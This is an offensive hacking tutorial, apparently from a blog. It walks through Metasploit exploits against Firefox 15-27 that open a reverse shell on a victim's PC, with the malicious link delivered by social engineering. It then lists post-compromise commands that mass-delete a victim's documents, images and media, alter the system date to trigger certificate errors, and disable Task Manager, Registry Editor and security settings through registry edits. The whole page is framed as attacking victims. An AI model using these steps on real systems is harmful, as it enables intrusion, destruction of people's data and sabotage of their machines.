Hack Remote Windows, Linux or MAC PC using Firefox WebIDL Privileged Javascript Injection

This exploit gains remote code execution on Firefox 22-27 by abusing two separate privilege escalation vulnerabilities in Firefox's Javascript APIs

Exploit Targets

Firefox 22-27

Windows XP SP 3

Windows 7

Linux

OSX

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/browser/firefox_webidl_injection

msf exploit (firefox_webidl_injection)>set payload firefox/shell_reverse_tcp

msf exploit (firefox_webidl_injection)>set lhost 192.168.0.5 (IP of Local Host)

msf exploit (firefox_webidl_injection)>set srvhost 192.168.0.5

msf exploit (firefox_webidl_injection)>set uripath /

msf exploit (firefox_webidl_injection)>exploit

Now an URL you should give to your victim http://192.168.0.5:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack Remote Windows, Linux, MAC PC using Firefox toString console.time Privileged JavaScript Injection

This exploit gains remote code execution on Firefox 15-22 by abusing two separate Javascript-related vulnerabilities to ultimately inject malicious Javascript code into a context running with chrome:// privileges.

Exploit Targets

Firefox Version 15-22

Windows 7

Linux

Solaris

OSX

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/browser/firefox_tostring_console_injection

msf exploit (firefox_tostring_console_injection)>set payload firefox/shell_reverse_tcp

msf exploit (firefox_tostring_console_injection)>set lhost 192.168.0.104 (IP of Local Host)

msf exploit (firefox_tostring_console_injection)>set srvhost 192.168.0.104

msf exploit (firefox_tostring_console_injection)>set uripath /

msf exploit (firefox_tostring_console_injection)>exploit

Now an URL you should give to your victim http://192.168.0.104:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

How to Delete ALL Types of Files in Remote PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

Delete All EXE Files

Example, if I wanted to delete all exe file

Del e:\*.*  /f /s /q

Delete ALL Doc Files

Example, if I wanted to delete all MS Office Document file named File with the file extension .doc

Del e:\*.doc  /f /s /q

Delete ALL PDF Files

Example, if I wanted to delete all pdf file named File with the file extension .pdf

Del e:\*.pdf  /f /s /q

Delete ALL Images

Example, if I wanted to delete all PNG, JPEG, BMP file named File with the file extension .png .bmp .jpg

Del e:\*.png  /f /s /q

Delete ALL MP3 Files

Example, if I wanted to delete all MP3 Files named File with the file extension .mp3

Del e:\*.mp3  /f /s /q

Delete ALL MP4 Files

Example, if I wanted to delete all MP4 named File with the file extension .mp4

Del e:\*.mp4  /f /s /q

Delete ALL Power Point Files

Example, if I wanted to delete all MS Office Power Point file named File with the file extension .ppt

Del e:\*.ppt  /f /s /q

Website Security Certificate Attack on Remote Windows PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

Type date and press enter. You’ll be prompted to enter a new date.

When Victim goes to a website He will get error message something like this:

“There is a problem with this website’s security certificate. The security certificate presented by this website has expired or is not yet valid.”

Best of Remote Windows PC Hacking Tricks (Part 1)

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

How to Disable and Enable services.msc

REG add "HKCU\Software\Policies\Microsoft\MMC\{58221C66-EA27-11CF-ADCF-00AA00A80033}" /v Restrict_Run /t REG_DWORD /d 1 /f

To Enable services.msc

REG add "HKCU\Software\Policies\Microsoft\MMC\{58221C66-EA27-11CF-ADCF-00AA00A80033}" /v Restrict_Run /t REG_DWORD /d 0 /f

How to Disable and Enable Internet Options

REG add "HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v NoBrowserOptions /t REG_DWORD /d 1 /f

To Enable Internet Options:

REG add "HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v NoBrowserOptions /t REG_DWORD /d 0 /f

How to Disable and Enable Folder Options

REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f

To Enable Folder Options:

REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 0 /f

How to Disable and Enable Security tab

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v Nosecuritytab /t REG_DWORD /d 1 /f

To Enable Security tab

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v Nosecuritytab /t REG_DWORD /d 0 /f

How to Disable and Enable Group Policy

REG add "HKCU\Software\Policies\Microsoft\MMC\{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /t REG_DWORD /d 1 /f

To Enable Group Policy

REG add "HKCU\Software\Policies\Microsoft\MMC\{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /t REG_DWORD /d 0 /f

How to Disable and Enable Task Manager

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

To Enable Task Manager

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f

How to Disable Registry Editor

REG add  HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f